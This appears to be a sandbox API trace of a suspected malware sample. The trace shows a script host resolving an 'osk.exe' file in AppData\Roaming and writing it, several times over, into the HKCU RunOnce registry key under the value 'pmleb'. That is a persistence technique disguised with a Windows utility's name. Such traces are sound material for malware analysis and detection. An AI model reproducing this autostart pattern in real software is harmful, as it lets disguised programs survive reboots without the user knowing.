0x0 [0079.787] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.787] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.787] SetTimer (hWnd=0x20280, nIDEvent=0x2051, uElapse=0xa, lpTimerFunc=0x0) returned 0x2051 [0079.787] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.799] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.799] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.800] KillTimer (hWnd=0x20280, uIDEvent=0x2051) returned 1 [0079.800] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.800] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.800] IUnknown:Release (This=0x787518) returned 0x1 [0079.800] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.800] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.800] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.800] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.800] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.801] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0079.801] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.801] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x53 [0079.801] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.802] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0079.802] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.802] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.802] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.802] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.802] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.802] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.802] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.802] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.802] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.802] RegCloseKey (hKey=0x280) returned 0x0 [0079.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.803] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.803] SetTimer (hWnd=0x20280, nIDEvent=0x2052, uElapse=0xa, lpTimerFunc=0x0) returned 0x2052 [0079.803] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.815] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.815] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.815] KillTimer (hWnd=0x20280, uIDEvent=0x2052) returned 1 [0079.815] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.815] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.816] IUnknown:Release (This=0x787518) returned 0x1 [0079.816] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.816] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.816] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.816] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.816] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0079.816] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.816] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x54 [0079.816] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.817] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0079.817] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.817] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.817] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.817] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.817] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.817] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.818] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.818] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.818] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.818] RegCloseKey (hKey=0x280) returned 0x0 [0079.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.818] SetTimer (hWnd=0x20280, nIDEvent=0x2053, uElapse=0xa, lpTimerFunc=0x0) returned 0x2053 [0079.818] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.831] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.831] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.831] KillTimer (hWnd=0x20280, uIDEvent=0x2053) returned 1 [0079.831] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.831] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.831] IUnknown:Release (This=0x787518) returned 0x1 [0079.831] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.831] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.832] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.832] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.832] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0079.832] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.832] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x55 [0079.832] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.833] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0079.833] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.833] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.833] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.833] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.833] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.833] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.833] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.833] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 